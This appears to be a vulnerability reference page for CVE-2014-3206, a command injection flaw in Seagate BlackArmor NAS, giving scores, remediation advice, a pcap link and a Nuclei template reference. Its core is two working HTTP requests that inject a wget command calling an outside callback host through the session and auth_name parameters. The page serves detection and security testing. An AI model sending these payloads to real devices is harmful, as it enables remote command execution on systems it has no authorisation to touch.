🔙 목록으로 돌아가기

CVE-2014-3206: Seagate BlackArmor NAS - Command Injection

TitleSeagate BlackArmor NAS - Command Injection
Authorgy741
SeverityCritical
ImpactSuccessful exploitation of this vulnerability allows an attacker to execute arbitrary commands with the privileges of the affected device, potentially leading to unauthorized access, data loss, or further compromise of the network.
RemediationApply the latest firmware update provided by Seagate to patch the command injection vulnerability.
CVSS Score9.8
EPSS Score0.9179
CVE IDCVE-2014-3206
CWE IDCWE-20
Tags cve2014 cve seagate rce edb vkev vuln

🔍 Vulnerability Description

Seagate BlackArmor NAS allows remote attackers to execute arbitrary code via the session parameter to localhost/backupmgt/localJob.php or the auth_name parameter to localhost/backupmgmt/pre_connect_check.php.

🌐 HTTP Request

GET /backupmgt/localJob.php?session=fail;wget+http://d5jqqn1le0o2v84qvld0wdjm55dzujky4.oast.me; HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Connection: close
Accept: */*
Accept-Encoding: gzip
GET /backupmgt/pre_connect_check.php?auth_name=fail;wget+http://d5jqqn1le0o2v84qvld0dyif76c7n3w1q.oast.me; HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/602.4.8 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8
Connection: close
Accept: */*
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2014/CVE-2014-3206.yaml

🦈 Packet Capture: ⬇️ Download cve-2014-3206.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A